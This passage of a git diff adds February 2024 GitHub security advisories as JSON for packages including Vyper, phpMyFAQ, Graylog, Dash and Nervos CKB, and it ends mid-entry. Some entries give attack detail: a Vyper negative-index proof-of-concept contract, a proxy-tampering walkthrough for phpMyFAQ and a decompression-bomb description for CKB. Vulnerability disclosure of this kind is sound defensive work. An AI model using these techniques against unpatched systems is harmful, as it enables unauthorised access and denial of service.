a/advisories/github-reviewed/2024/02/GHSA-3gjh-29fv-8hr6/GHSA-3gjh-29fv-8hr6.json b/advisories/github-reviewed/2024/02/GHSA-3gjh-29fv-8hr6/GHSA-3gjh-29fv-8hr6.json new file mode 100644 index 0000000000000..f1028b8a8c21e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-3gjh-29fv-8hr6/GHSA-3gjh-29fv-8hr6.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gjh-29fv-8hr6", + "modified": "2024-02-03T00:18:10Z", + "published": "2024-02-03T00:18:10Z", + "aliases": [ + + ], + "summary": "Nervos CKB Snappy decompress length can be very large and causes out of memory error ", + "details": "### Impact\n\nAdversary can create message which compressed size is less than the package limit but the decompressed length is very large such as 1G. It will cost the node many memories to process the network messages, and on the system with less than 1G memory, the process is killed directly because of out of memory error.\n\n### Patches\n\nThe node must check the decompress length before allocating the memory for the message.\n\n### References\n\n* https://github.com/nervosnetwork/ckb/blob/687d797f1888dd05d1f38ce6d1bef3e5b9b6e38b/network/src/compress.rs#L68\n* https://github.com/BurntSushi/rust-snappy/blob/master/src/decompress.rs#L106\n* https://github.com/BurntSushi/rust-snappy/blob/6cfb836463b9b3ac48ca7cd15d0a50d030e95769/src/decompress.rs#L30", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.34.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.34.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-3gjh-29fv-8hr6" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:18:10Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-3qx3-6hxr-j2ch/GHSA-3qx3-6hxr-j2ch.json b/advisories/github-reviewed/2024/02/GHSA-3qx3-6hxr-j2ch/GHSA-3qx3-6hxr-j2ch.json new file mode 100644 index 0000000000000..26ac73abc12b6 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-3qx3-6hxr-j2ch/GHSA-3qx3-6hxr-j2ch.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qx3-6hxr-j2ch", + "modified": "2024-02-08T18:47:28Z", + "published": "2024-02-08T18:47:28Z", + "aliases": [ + + ], + "summary": "eza Potential Heap Overflow Vulnerability for AArch64", + "details": "### Summary\nIn `eza`, there exists a potential heap overflow vulnerability, first seen when using Ubuntu for Raspberry Pi series system, on `ubuntu-raspi` kernel, relating to the `.git` directory.\n\n### Details\nThe vulnerability seems to be triggered by the `.git` directory in some projects. This issue may be related to specific files, and the directory structure also plays a role in triggering the vulnerability. Files/folders that may be involved in triggering the vulnerability include `.git/HEAD`, `.git/refs`, and `.git/objects`.\n\nAs @polly pointed out to me, this is likely caused by [GHSA-j2v7-4f6v-gpg8](https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8), which we do seem to use currently.\n\n### PoC\nFor more information check @CuB3y0nd's blogpost [blog](https://www.cubeyond.net/blog/eza-cve-report).\n\n### Impact\nArbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "eza" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.18.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/eza-community/eza/security/advisories/GHSA-3qx3-6hxr-j2ch" + }, + { + "type": "WEB", + "url": "https://github.com/eza-community/eza/commit/47c9b90368c49117ba42760bd58acafa3362cbd4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/eza-community/eza" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:47:28Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-3rfr-mpfj-2jwq/GHSA-3rfr-mpfj-2jwq.json b/advisories/github-reviewed/2024/02/GHSA-3rfr-mpfj-2jwq/GHSA-3rfr-mpfj-2jwq.json new file mode 100644 index 0000000000000..3730cb070b070 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-3rfr-mpfj-2jwq/GHSA-3rfr-mpfj-2jwq.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rfr-mpfj-2jwq", + "modified": "2024-02-07T20:24:53Z", + "published": "2024-02-07T18:25:36Z", + "aliases": [ + "CVE-2024-24822" + ], + "summary": "Pimcore Admin Classic Bundle permissions are not getting checked when working with tags", + "details": "### Impact\nYou can create, delete etc. tags without having the permission to do so.\nThis vulnerability allows an attacker to perform broken access control and add tags to admin panel and add dumy data. One can do this as intruder and add text parameters with random numbers and this will effect integrity and availability.\n\n### Patches\nAvailable in version 1.3.3.\n\n### Workarounds\nApply this pull request manually: https://github.com/pimcore/admin-ui-classic-bundle/pull/412\n\n### References\n-\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "pimcore/admin-ui-classic-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.3.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3rfr-mpfj-2jwq" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24822" + }, + { + "type": "WEB", + "url": "https://github.com/pimcore/admin-ui-classic-bundle/pull/412" + }, + { + "type": "WEB", + "url": "https://github.com/pimcore/admin-ui-classic-bundle/commit/24660b6d5ad9cbcb037a48d4309a6024e9adf251" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pimcore/admin-ui-classic-bundle" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T18:25:36Z", + "nvd_published_at": "2024-02-07T18:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json b/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json new file mode 100644 index 0000000000000..f97e927121df9 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3ww4-gg4f-jr7f", + "modified": "2024-02-05T23:04:50Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2023-50782" + ], + "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack", + "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "cryptography" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "42.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://github.com/pyca/cryptography/issues/9785" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pyca/cryptography" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:04:50Z", + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-3xf8-g8gr-g7rh/GHSA-3xf8-g8gr-g7rh.json b/advisories/github-reviewed/2024/02/GHSA-3xf8-g8gr-g7rh/GHSA-3xf8-g8gr-g7rh.json new file mode 100644 index 0000000000000..9855c5aa9748c --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-3xf8-g8gr-g7rh/GHSA-3xf8-g8gr-g7rh.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3xf8-g8gr-g7rh", + "modified": "2024-02-07T20:24:43Z", + "published": "2024-02-07T18:24:20Z", + "aliases": [ + "CVE-2024-24823" + ], + "summary": "Graylog session fixation vulnerability through cookie injection", + "details": "### Impact\nReauthenticating with an existing session cookie would re-use that session id, even if for different user credentials.\nIn this case, the pre-existing session could be used to gain elevated access to an existing Graylog login session, provided the malicious user could successfully inject their session cookie into someone else's browser.\n\nThe complexity of such an attack is high, because it requires presenting a spoofed login screen and injection of a session cookie into an existing browser, potentially through an XSS attack. No such attack has been discovered.\n\n### Patches\nGraylog 5.1.11 and 5.2.4, and any versions of the 6.0 development branch contain patches to not re-use sessions under any circumstances, making this type of attack impossible.\n\n### Workarounds\nUsing short session expiration and explicit log outs of unused sessions can help limiting the attack vector. Unpatched this vulnerability exists, but is relatively hard to exploit.\nA proxy could be leveraged to clear the `authentication` cookie for the Graylog server URL for the `/api/system/sessions` endpoint, as that is the only one vulnerable.\n\nAnalysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "5.1.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.2.0-alpha.1" + }, + { + "fixed": "5.2.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3xf8-g8gr-g7rh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24823" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/1596b749db86368ba476662f23a0f0c5ec2b5097" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/b93a66353f35a94a4e8f3f75ac4f5cdc5a2d4a6a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Graylog2/graylog2-server" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T18:24:20Z", + "nvd_published_at": "2024-02-07T18:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-52xq-j7v9-v4v2/GHSA-52xq-j7v9-v4v2.json b/advisories/github-reviewed/2024/02/GHSA-52xq-j7v9-v4v2/GHSA-52xq-j7v9-v4v2.json new file mode 100644 index 0000000000000..3287ceab8da93 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-52xq-j7v9-v4v2/GHSA-52xq-j7v9-v4v2.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-52xq-j7v9-v4v2", + "modified": "2024-02-07T20:23:59Z", + "published": "2024-02-07T17:27:58Z", + "aliases": [ + "CVE-2024-24563" + ], + "summary": "Vyper array negative index vulnerability", + "details": "### Summary\nArrays can be keyed by a signed integer, while they are defined for unsigned integers only. The typechecker doesn't throw when spotting the usage of an `int` as an index for an array. Typically, negative integers are filtered out at runtime by the bounds checker, but small enough (i.e. large in magnitude, ex. `-2**255 + 5`) quantities combined with large enough arrays (at least `2**255` in length) can pass the bounds checker, resulting in unexpected behavior.\n\nA contract search was performed, and no production contracts were found to be impacted.\n\n### Details\nThe typechecker allows the usage of signed integers to be used as indexes to arrays. The vulnerability is present in different forms in all versions. Here is an example from `0.3.10`:\nhttps://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137\n\nAs can be seen, the validation is performed against `IntegerT.any()`.\n\n### PoC\nIf the array is sufficiently large, it can be indexed with a negative value:\n```python\narr: public(uint256[MAX_UINT256])\n\n@external\ndef set(idx: int256, num: uint256):\n self.arr[idx] = num\n```\nFor signed integers, the 2's complement representation is used. Because the array was declared very large, the bounds checking will pass (negative values will simply be represented as very large numbers):\nhttps://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541\n\n\n### Impact\nThere are two potential vulnerability classes: unpredictable behavior and accessing inaccessible elements.\n\n1. If it is possible to index an array with a negative integer without reverting, this is most likely not anticipated by the developer and such accesses can cause unpredictable behavior for the contract.\n\n2. If a contract has an invariant in the form `assert index < x` where both `index` and `x` are signed integers, the developer might suppose that no elements on indexes `y | y >= x` are accessible. However, by using negative indexes this can be bypassed.\n\nThe contract search found no production contracts impacted by these two classes of issues.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-52xq-j7v9-v4v2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24563" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vyperlang/vyper" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-129" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:27:58Z", + "nvd_published_at": "2024-02-07T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-547x-748v-vp6p/GHSA-547x-748v-vp6p.json b/advisories/github-reviewed/2024/02/GHSA-547x-748v-vp6p/GHSA-547x-748v-vp6p.json new file mode 100644 index 0000000000000..f5b25322d9eb3 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-547x-748v-vp6p/GHSA-547x-748v-vp6p.json @@ -0,0 +1,169 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-547x-748v-vp6p", + "modified": "2024-02-02T18:10:51Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2024-21485" + ], + "summary": "Dash apps vulnerable to Cross-site Scripting", + "details": "Versions of the package dash-core-components before 2.13.0; all versions of the package dash-core-components; versions of the package dash before 2.15.0; all versions of the package dash-html-components; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server.\n\n**Note:**\n\nThis is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "dash-core-components" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.13.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "dash-html-components" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.0.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "dash-core-components" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.0.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "dash" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.15.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "dash-html-components" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.16" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21485" + }, + { + "type": "WEB", + "url": "https://github.com/plotly/dash/issues/2729" + }, + { + "type": "WEB", + "url": "https://github.com/plotly/dash/pull/2732" + }, + { + "type": "WEB", + "url": "https://github.com/plotly/dash/commit/9920073c9a8619ae8f90fcec1924f2f3a4332a8c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/plotly/dash" + }, + { + "type": "WEB", + "url": "https://github.com/plotly/dash/releases/tag/v2.15.0" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-DASHCORECOMPONENTS-6183084" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-DASHHTMLCOMPONENTS-6226337" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-PYTHON-DASH-6226335" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-PYTHON-DASHCORECOMPONENTS-6226334" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-PYTHON-DASHHTMLCOMPONENTS-6226336" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:51Z", + "nvd_published_at": "2024-02-02T05:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-59qj-jcjv-662j/GHSA-59qj-jcjv-662j.json b/advisories/github-reviewed/2024/02/GHSA-59qj-jcjv-662j/GHSA-59qj-jcjv-662j.json new file mode 100644 index 0000000000000..be0a05ca4a1d0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-59qj-jcjv-662j/GHSA-59qj-jcjv-662j.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-59qj-jcjv-662j", + "modified": "2024-02-08T15:32:52Z", + "published": "2024-02-08T15:32:51Z", + "aliases": [ + "CVE-2024-24825" + ], + "summary": "DIRAC's TokenManager does not check permissions on cached tokens", + "details": "### Impact\n\nAny user could get a token that has been requested by another user/agent\n\n### Patches\nThe vulnerability is fixed in version 8.0.37.\n\n### Workarounds\n\nNone\n\n### References\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "DIRAC" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.0.37" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-59qj-jcjv-662j" + }, + { + "type": "WEB", + "url": "https://github.com/DIRACGrid/DIRAC/commit/9487921684e2925b4cf72d6c423718cf4950f3fe" + }, + { + "type": "WEB", + "url": "https://github.com/DIRACGrid/DIRAC/commit/f9ddab755b9a69acb85e14d2db851d8ac0c9648c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/DIRACGrid/DIRAC" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:32:51Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-5x4g-q5rc-36jp/GHSA-5x4g-q5rc-36jp.json b/advisories/github-reviewed/2024/02/GHSA-5x4g-q5rc-36jp/GHSA-5x4g-q5rc-36jp.json new file mode 100644 index 0000000000000..a14f3e12aeee0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-5x4g-q5rc-36jp/GHSA-5x4g-q5rc-36jp.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5x4g-q5rc-36jp", + "modified": "2024-02-03T00:02:58Z", + "published": "2024-02-03T00:02:58Z", + "aliases": [ + + ], + "summary": "Etcd pkg Insecure ciphers are allowed by default", + "details": "### Vulnerability type\nCryptography\n\n### Detail\nThe TLS ciphers list supported by etcd by default contains weak ciphers.\n\n### Workarounds\nProvide a desired ciphers using the `--cipher-suites` flag as described with examples in the [security documentation](https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/security.md)\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd/client/pkg/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd/client/pkg/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-5x4g-q5rc-36jp" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:02:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-6648-6g96-mg35/GHSA-6648-6g96-mg35.json b/advisories/github-reviewed/2024/02/GHSA-6648-6g96-mg35/GHSA-6648-6g96-mg35.json new file mode 100644 index 0000000000000..18c166a70df55 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-6648-6g96-mg35/GHSA-6648-6g96-mg35.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6648-6g96-mg35", + "modified": "2024-02-05T23:05:03Z", + "published": "2024-02-05T20:20:40Z", + "aliases": [ + "CVE-2024-22202" + ], + "summary": "phpMyFAQ User Removal Page Allows Spoofing Of User Details", + "details": "### Summary\nphpMyFAQ's user removal page allows an attacker to spoof another user's detail, and in turn make a compelling phishing case for removing another user's account.\n\n### Details\nphpMyFAQ's user removal page allows an attacker to spoof another user's detail, and in turn make a compelling phishing case for removing another user's account. Whilst the front-end of this page doesn't allow changing the form details, an attacker can utilize a proxy to intercept this request and submit other data. Upon submitting this form, an email is sent to the administrator informing them that this user wants to delete their account. An administrator has no way of telling the difference between the actual user wishing to delete their account or the attacker issuing this for an account they do not control.\n\n### PoC\nWe are logged in as `hacker` and visit `/user/request-removal`. This brings us to the following page. We are not able to change the `username`, `Your name` and `Your email address` fields on this page.\n![image](https://user-images.githubusercontent.com/44903767/296202382-9e6d6409-3ffb-4983-8895-9903e7dfc663.png)\n\nHowever, we intercept this request using a proxy tool such as BurpSuite.\n![image](https://user-images.githubusercontent.com/44903767/296202522-dd80fe87-e7b7-4fe2-97be-dca03289f506.png)\n\nWe can now edit the request before sending it. We change the fields mentioned above to the details of another user, and send the request.\n![image](https://user-images.githubusercontent.com/44903767/296202705-fa8fd3f8-1417-457e-9d6e-7e4ba0f8744a.png)\n\nThis results in the following email being sent to the administrator. For them, it looks like the victim wants to delete their account.\n![image](https://user-images.githubusercontent.com/44903767/296202935-a5c48e0b-f93e-488a-9716-4f93889100a7.png)\n\n### Impact\nThe impact of this vulnerability is that administrators cannot trust the emails sent by the platform. An attacker can easily make a compelling case to perform phishing and get victim accounts deleted.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyfaq/phpmyfaq" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6648-6g96-mg35" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22202" + }, + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/commit/1348dcecdaec5a5714ad567c16429432417b534d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/thorsten/phpMyFAQ" + }, + { + "type": "WEB", + "url": "https://www.phpmyfaq.de/security/advisory-2024-02-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:20:40Z", + "nvd_published_at": "2024-02-05T20:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-6726-2rx3-cgwh/GHSA-6726-2rx3-cgwh.json b/advisories/github-reviewed/2024/02/GHSA-6726-2rx3-cgwh/GHSA-6726-2rx3-cgwh.json new file mode 100644 index 0000000000000..70dae29dfe4cf --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-6726-2rx3-cgwh/GHSA-6726-2rx3-cgwh.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6726-2rx3-cgwh", + "modified": "2024-02-07T19:23:35Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2023-39196" + ], + "summary": "Apache Ozone Improper Authentication vulnerability", + "details": "Improper Authentication vulnerability in Apache Ozone.\n\nThe vulnerability allows an attacker to download metadata internal to the Storage Container Manager service without proper authentication.\nThe attacker is not allowed to do any modification within the Ozone Storage Container Manager service using this vulnerability.\nThe accessible metadata does not contain sensitive information that can be used to exploit the system later on, and the accessible data does not make it possible to gain access to actual user data within Ozone.\nThis issue affects Apache Ozone: 1.2.0 and subsequent releases up until 1.3.0.\n\nUsers are recommended to upgrade to version 1.4.0, which fixes the issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.ozone:ozone-main" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.2.0" + }, + { + "fixed": "1.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39196" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/ozone" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/o96ct5t7kj5cgrmmfc6756m931t08nky" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/07/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T19:23:35Z", + "nvd_published_at": "2024-02-07T13:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-6845-xw22-ffxv/GHSA-6845-xw22-ffxv.json b/advisories/github-reviewed/2024/02/GHSA-6845-xw22-ffxv/GHSA-6845-xw22-ffxv.json new file mode 100644 index 0000000000000..045c42009f7aa --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-6845-xw22-ffxv/GHSA-6845-xw22-ffxv.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6845-xw22-ffxv", + "modified": "2024-02-05T23:06:50Z", + "published": "2024-02-05T19:21:52Z", + "aliases": [ + "CVE-2024-24559" + ], + "summary": "Vyper sha3 codegen bug", + "details": "### Summary\nThere is an error in the stack management when compiling the `IR` for `sha3_64`. Concretely, the `height` variable is miscalculated.\nThe vulnerability can't be triggered without writing the `IR` by hand. That is, it cannot be triggered from regular vyper code, it can only be triggered by using the `fang` binary directly (this binary used to be called `vyper-ir` prior to v0.3.4).\n\n### Details\nTo compile `sha3_64`, the `arg[0]` and `arg[1]` have to be 